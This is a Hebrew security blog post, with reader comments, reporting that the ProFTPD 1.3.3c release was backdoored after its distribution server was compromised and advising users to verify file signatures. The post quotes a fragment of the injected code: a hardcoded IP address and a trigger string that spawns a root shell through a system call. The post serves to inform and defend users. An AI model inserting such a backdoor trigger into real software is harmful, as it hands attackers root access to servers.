!ProFTPD 1.3.3c was Backdoored

[מקור: http://www.shadowsanctum.net/interactive/fanart_archive/corey-Shadow_Door.jpg] 

 

 מסתבר שבתחילת השבוע שרת ההפצה המרכזי של ProFTPD נפרץ (ftp.proftpd.org), וגרסאת ה-Release של השירות הוחלפה בגרסא עם דלת אחורית שמאפשרת לתוקף להתחבר לשרת מבלי הצורך להזדהות לאחד החשבונות שהוגדרו במערכת (הקובץ המשוכתב

הגיע גם לשרתי ה-Mirroring תחת rsync), להודעה המקורית:

http://proftpd.org

 

לפרטים נוספים:

http://www.net-security.org/secworld.php?id=10243

 

ולמידע טכני על הקוד שנוסף (Diff):

http://www.exploit-db.com/exploits/15662

 

מדובר בשירות מאוד פופולארי, ולכן מומלץ לעקוב אחר ההוראות ולבדוק האם יש לכם בשרת (במידה ואתם משתמשים בשירות הנ"ל) דלת אחורית,ניתן לעשות זאת בקלות על ידי השוואת חתימה הקובץ שממנו התקנתם לבין מה שמפורסם בשרת ההורדה:

http://proftpd.org/md5_pgp.html

 

אגב, לי זה קצת מזכיר את המקרה הזה:

http://www.digitalwhisper.co.il/0x20

 

עדכון:

 

ניתן לראות לפי הקוד ששונה, שהתוקפים התכוונו להתחבר מכתובת ה-IP:

char ip[20]="212.26.42.47"; 

 

(כתובת ה-IP הייתה Hardcoded בקוד עצמו). לפי הדיווחים באינטרנט הכתובת הזאת מגיעה מערב הסעודית, ולפי הקוד הבא: 

if (strcmp(target, "ACIDBITCHEZ") == 0) ( setuid(0); setgid(0); system("/bin/sh;/sbin/sh");  )

 

ניתן להבין שהפקודה HELP (קצת לפני הקוד שציטטתי) ביחד עם המחרוזת "ACIDBITCHEZ" הייתה גורמת לשירות להגיש לתוקף Remote Shell על השרת.

 



תגובות על '!ProFTPD 1.3.3c was Backdoored':



#1 

sdimant:
וואו, לא נחמד!
(first!)
03.12.2010 00:04:41

#2 

שמיל (אורח):
איך שראיתי את הכותרות ב-Packerstorm ישר נזכרתי בקטע עם Unreal... לפי איך שמשתמע הם פרצו לאתר דרך חולשה בשרות ה-FTPd, מה שאומר שכנראה יש להם 0day למערכת הזאת... מה שקצת מוזר- כי אם הם מצאו חולשה למערכת הזאת- למה הם צריכים להכניס Backdoor? צריך לברר את זה!
03.12.2010 11:43:04

#3 

Hero (אורח):
תודה על העדכון אני אשתדל להזהר
03.12.2010 12:50:32

#4 

Dm12 (אורח):
התוקפים צריכים למצוא פתרון כזה שכשבעלי האתר מורידים או צופים בעמוד הם יורידו תוכן אחד אבל כששאר המשתמשים מתחברים- הם יראו תוכן אחר. כך חיי ה-Backdoor יהיו ארוכים יותר. השאלה היא האם זה בכלל אפשרי.
03.12.2010 13:09:24

#5 

cp77fk4r:
Dm12 - תוכל לנסות לשנות את הקוד באופן כזה שה-MD5 שלו יהיה שווה ל-MD5 של הקוד המקורי (זה אפשרי בתיאוריה, אני לא מאמין שאפשר לממש את זה) ע"י מציאת Collusions. אבל לא תוכל לנצח את Diff שתמיד יסגיר אותך.
03.12.2010 13:16:52

#6 

Dm12 (אורח):
אתה מדבר כמו על הדוגמאות מהמאמר שלך ושל גדיאלכסנדרוביץ׳?
04.12.2010 23:05:19

#7 

cp77fk4r:
בהחלט.
05.12.2010 06:22:39

#8 

בן דהן (אורח):
היי כולם, דבר ראשון תודה רבה על המידע! אני קורא קבוע שלכם. יש לי שאלה בנושא הפוסט הנ״ל: אני משתמש ותיק של השירות עוד מגרסאותיו הראשונות והייתי מעוניין לדעת האם אתם ממליצים להמשיך להשתמש השירות הנ״ל. ברור לי שהקוד לא הוכנס לשם בכוונה וששרת הפצות נפרץ, אבל מעניין אותי להבין איך אותם פושעים חדרו לשרת. לפי ההודעה שג׳ון פרסם בקהילה שם, התוקפים חדרו דרך חולשה בשירות ה-FTP שלהם, עכשיו, לפי מה שהבנתי מההודעה- הם פרצו ורק לאחר מכן הכניסו בקוד קוד שמאפשר להם להתחבר מבלי לבצע הזדהות תקינה- מה שאומר שגם אם בהפצה שלי אין את הקוד שהם הכניסו- עדיין יש את החולשה שדרכה הם חדרו לשרת מלכתחילה, לא? תודה רבה!
05.12.2010 19:31:51

#9 

iTK98:
לא נאמר בהודעת האתר איך הגירסה הנגועה הועלתה,
לא נאמר אם קיימת פירצה או אם פרצו למנהל מערכת
שלדעתי זה מה שקרה.

פריצות כאלו נפוצות מאוד, הן בדרך כלל משתמשות
בחוליה החלשה, לאו דווקא פירצה בשרת ProFTPd כי
אז היינו גם רואים 0Day שאין כמעט שליטה לקבוצה
אחרי שכבר נעשה בו שימוש. יכול להיות שפרצו לאחד
ממנהלי המערכת והעלו דרך המנוי שלו את הגירסה
הנגועה, מספיק להעלות את הגירסה הנגוע לשרת הראשי
ומשם הוא יופץ לשאר השרתים המבצעים סינכרון.

אין ספק שהאמון במפתחי ProFTPd ירד, אבל בסופו של
דבר הם מציעים אפשרויות בשירות שלהם, שמפתחים
אחרים כרגע לא מציעים, ואם אין ברירה... אז אין
ברירה.

תלוי מתי ההפצה משכה את הגירסה מהשרתים של ProFTPd.
הגירסה האחרונה שוחררה ב-29 באוקטובר, בעוד
שהגירסה הנגועה הייתה על השרתים בין ה-28 בנובמבר
לבין ה-2 בדצמבר, לכן רוב הסיכויים שהגירסה
שההפצה שלך מציעה אינה נגועה. בנוסף לכך הם לא
נגעו בקבצי חתימות, לכן אם מפתחי ההפצה אחראים
הם בדקו את החתימות לפני שהכניסו את החבילה שהם
פיתחו לתוך ההפצה שלהם.
05.12.2010 19:51:47

#10 

בן דהן (אורח):
תודה רבה לך על התשובה הזריזה! לפי הפיסקה:
״The
attackers most likely used an unpatched security issue in the FTP daemon״

אני מבין שכן ככל הנראה נעשה שימוש בפרצה בשירות ה-FTPD, או שאני מפספס משהו?
05.12.2010 21:18:08

#11 

iTK98:
הציטוט הוא של גורמים רשמיים (מפתחי, בעלי האתר,
וכיוצ"ב)? בכל האתרים שיצא לי לקרוא, מדברים על
השערות. שים לב שכתוב "Most likely". לדעתי לא היה
שימוש ב-exploit כנגד השירות, אחרת היה בנוסף לכך
שיחרור של גירסה חדשה.

יכול להיות שעובדים עליה, אבל אז הם חוטאים בכך
שהם לא מדווחים לציבור המשתמשים שלהם שהם עושים
שימוש בגירסה פגיעה וזאת סיבה מספיק טובה לנטוש
אותם.
06.12.2010 13:34:34

#12 

בן דהן (אורח):
הציטוט הוא מההודעה הרשמית בפורום שלהם... בכל אופן- תודה רבה על התשובות!
06.12.2010 14:55:23

#13 

בן דהן (אורח):
ועוד דבר- באיזה שירות FTPD אתה ממליץ כן להשתמש?
06.12.2010 14:55:50

#14 

שמיל (אורח):
יצא לי להשתמש די הרבה בשירותי vsftpd והוא מומלץ. אבל לא עקבתי אחרי גרסאות אחרונות.
06.12.2010 19:42:59

#15 

iTK98:
אני אישית מעדיף את vsftpd, בעיקר מתאימי נוחות. יש
לזכור שהוא לא מודולרי כ-proftpd והוא רחוק מלהציע
את שלל התוספים שקיימים ל-proftpd. אם אין לך שימוש
בהם, אין סיבה (לדעתי בכל מקרה) שלא תעבור ל-vsftpd.
06.12.2010 19:45:34

#16 

בן דהן (אורח):
תודה רבה על התגובות! אני אנסה אותו ואגיב לאחר נסיון.
שוב- תודה רבה!
14.12.2010 22:07:39

#17 

בן דהן (אורח):
תודה רבה כולם! הכלי בהחלט מספק את מה שחיפשתי!
17.12.2010 11:36:26

#18 

אורח (אורח):
גם vsftpd קיבל בעיטה כואבת.
http://www.pentestit.com/2011/07/05/poc-vsftpd-backdoor-discovered/
05.07.2011 23:08:35



הוסף את תגובתך:
כינוי:
תגובה:
קוד אבטחה:
העתק לכאן את הקוד:
 
Digital Whisper © 2009 - 2014 - כל הזכויות שמורות ל-אפיק קסטיאל ול-ניר אדר.